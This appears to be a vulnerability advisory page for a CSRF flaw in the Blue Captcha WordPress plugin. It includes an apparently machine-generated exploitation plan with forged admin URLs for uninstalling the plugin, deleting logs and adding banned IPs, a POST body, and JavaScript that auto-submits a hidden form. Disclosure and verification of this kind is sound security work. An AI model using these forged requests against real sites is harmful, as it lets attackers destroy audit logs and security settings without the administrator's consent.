CVE-2026-10552

Blue Captcha <= 2.0.1 - Cross-Site Request Forgery via 'blcap_action' Parameter

mediumCross-Site Request Forgery (CSRF)
4.3
CVSS Score
4.3
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Blue Captcha plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 2.0.1. This is due to missing or incorrect nonce validation on the main admin panel (blcap_main_page) and on the Hall of Shame and Log subpages, which accept a 'blcap_action' / 'action' parameter from $_REQUEST and perform destructive operations (plugin uninstall via blcap_uninstall(), log deletion via blcap_delete_logs(), Hall of Shame deletion via blcap_delete_ip_db(), and adding IPs to the banned list via update_option('blcap_settings')) with no wp_verify_nonce(), check_admin_referer(), or check_ajax_referer() calls anywhere in the codebase. This makes it possible for unauthenticated attackers to uninstall the plugin, delete audit logs, remove Hall of Shame entries, and add arbitrary IP addresses to the block list via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
Required
Scope
Unchanged
None
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=2.0.1
PublishedJune 23, 2026
Last updatedJune 24, 2026
Affected pluginblue-captcha
Research Plan
Unverified

# Exploitation Research Plan: CVE-2026-10552 (Blue Captcha CSRF) This plan outlines the technical steps required to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Blue Captcha plugin (<= 2.0.1). ## 1. Vulnerability Summary The Blue Captcha plugin fails to implement nonce verific…

Show full research plan

Exploitation Research Plan: CVE-2026-10552 (Blue Captcha CSRF)

This plan outlines the technical steps required to verify the Cross-Site Request Forgery (CSRF) vulnerability in the Blue Captcha plugin (<= 2.0.1).

1. Vulnerability Summary

The Blue Captcha plugin fails to implement nonce verification on its administrative interfaces. Destructive operations—including plugin uninstallation, log deletion, and IP blacklisting—are triggered via the blcap_action or action parameters within the $_REQUEST superglobal. Because the plugin does not check for a valid WordPress nonce or verify the request origin (via check_admin_referer), an attacker can trick an authenticated administrator into performing these actions by enticing them to visit a malicious URL or submit a hidden form.

2. Attack Vector Analysis

  • Vulnerable Endpoint: /wp-admin/admin.php (specifically when the page parameter is set to the plugin's menu slug, likely blue-captcha).
  • Action Parameter: blcap_action or action (retrieved via $_REQUEST).
  • Authentication Level: Requires an active session of a user with manage_options capabilities (typically an Administrator).
  • Preconditions: The victim must be logged into the WordPress dashboard and interact with the attacker's forged request (e.g., clicking a link or loading a page with an auto-submitting form).

3. Code Flow (Inferred)

  1. Entry Point: The plugin registers an admin menu page via add_menu_page() or add_submenu_page() in a function hooked to admin_menu.
  2. Controller Logic: The callback function for the main admin page (referenced as blcap_main_page in the description) likely contains a conditional block:
    // Inferred logic based on vulnerability description
    if ( isset( $_REQUEST['blcap_action'] ) ) {
        $action = $_REQUEST['blcap_action'];
        if ( $action == 'uninstall' ) {
            blcap_uninstall();
        } elseif ( $action == 'delete_logs' ) {
            blcap_delete_logs();
        }
        // ... and so on
    }
    
  3. Sink: Functions like blcap_uninstall(), blcap_delete_logs(), and blcap_delete_ip_db() are called directly without any wp_verify_nonce() or current_user_can() checks inside the action-handling logic.

4. Nonce Acquisition Strategy

According to the vulnerability description, there are no nonce checks implemented for these actions.

  • Nonce Status: Not Required.
  • Bypass: The vulnerability exists because the security control is entirely absent. No acquisition from the DOM or JS variables is necessary to execute the state-changing request.

5. Exploitation Strategy

The goal is to demonstrate that an unauthenticated attacker can force an administrator to trigger the blcap_uninstall() function via CSRF.

Step 1: Trigger Plugin Uninstall

The attacker crafts a URL that, when loaded by the admin, triggers the uninstallation.

  • Tool: http_request
  • Method: GET (Since $_REQUEST is used, GET is typically sufficient and easier to exploit via simple links or tags).
  • URL: http://[target-site]/wp-admin/admin.php?page=blue-captcha&blcap_action=uninstall
  • Headers:
    • Cookie: [Admin Session Cookies] (Simulated in the agent's browser environment).

Step 2: Clear Hall of Shame (Alternative Action)

  • Method: GET
  • URL: http://[target-site]/wp-admin/admin.php?page=blue-captcha&blcap_action=delete_ip_db

Step 3: Add Arbitrary IP to Blocklist

The description mentions update_option('blcap_settings') is vulnerable. This likely requires a POST request to mimic a settings save.

  • Method: POST
  • URL: http://[target-site]/wp-admin/admin.php?page=blue-captcha
  • Content-Type: application/x-www-form-urlencoded
  • Body: blcap_action=update_settings&blcap_settings[banned_ips]=13.37.13.37 (Structure inferred; blcap_settings is the option name mentioned).

6. Test Data Setup

Before exploitation, ensure the environment is populated:

  1. Activate Plugin: wp plugin activate blue-captcha
  2. Generate Logs: Perform several failed login attempts to populate the "Log" subpage.
  3. Populate Hall of Shame: Manually add an IP or use wp option update blcap_settings ... to ensure the database has data to delete.
  4. Identify Slug: Verify the admin page slug using wp admin-menu list | grep Blue.

7. Expected Results

  • Uninstall Action: The plugin should be deactivated and its data (options) removed from the wp_options table. The user might be redirected to the main plugins page.
  • Log Deletion: Navigating to the Blue Captcha log page should show "No logs found" or an empty table.
  • IP Blocklist: The blcap_settings option in the database should reflect the attacker-supplied IP address.

8. Verification Steps

After sending the HTTP requests, verify the impact via WP-CLI:

  1. Check Plugin Status:
    wp plugin is-active blue-captcha
    (Expected: Failure/Not active if uninstall was triggered)
  2. Check Banned IPs:
    wp option get blcap_settings
    (Expected: Presence of the injected IP address)
  3. Check Logs Table (if custom table used):
    wp db query "SELECT COUNT(*) FROM wp_blcap_logs" (Table name inferred)
    (Expected: 0)

9. Alternative Approaches

  • Action Parameter Variations: If blcap_action fails, attempt using the standard WordPress action parameter: admin.php?page=blue-captcha&action=uninstall.
  • Request Method Enforcement: If the server or plugin enforces POST, use browser_eval to create and submit a hidden form programmatically:
    const form = document.createElement('form');
    form.method = 'POST';
    form.action = '/wp-admin/admin.php?page=blue-captcha';
    const input = document.createElement('input');
    input.name = 'blcap_action';
    input.value = 'uninstall';
    form.appendChild(input);
    document.body.appendChild(form);
    form.submit();
    
  • Subpage Targeting: If the main page doesn't handle the action, target the subpages mentioned: admin.php?page=blcap_logs&blcap_action=delete_logs.

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.